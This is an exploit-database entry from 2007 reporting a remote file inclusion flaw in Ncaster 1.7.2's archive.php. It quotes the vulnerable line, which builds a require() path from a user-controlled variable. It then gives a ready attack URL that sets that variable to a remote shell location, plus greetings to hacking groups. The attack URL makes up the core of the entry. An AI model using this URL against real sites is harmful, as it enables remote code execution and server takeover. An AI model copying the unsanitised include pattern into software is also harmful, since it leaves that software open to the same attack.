Ncaster 1.7.2 (archive.php) Remote File Inclusion Vulnerability

2007-08-09T00:00:00
ID 1337DAY-ID-2068
Type zdt
Reporter k1n9k0ng
Modified 2007-08-09T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===============================================================
Ncaster 1.7.2 (archive.php) Remote File Inclusion Vulnerability
===============================================================



+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Scripts         : Ncaster 1.7.2
Discovered By   : k1n9k0ng
Scripts site    : http://ncastercms.com/downloads/ncaster172.zip
Thanks To       : #sekuritionline, #semprol, #mimid, #r.i.p, #x-code, #yogyafree
special To      : adhietslank, babypunk, bugs_, cyberlog, cah_gemblunkz
site            : www.sekuritionline.net
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

bug Script:
require("$adminfolder/sources/datelib.php");

bug found:
"http://www.site.net/ncaster/admin/addons/archive/archive.php?adminfolder=[shell]"



#  0day.today [2018-01-03]  #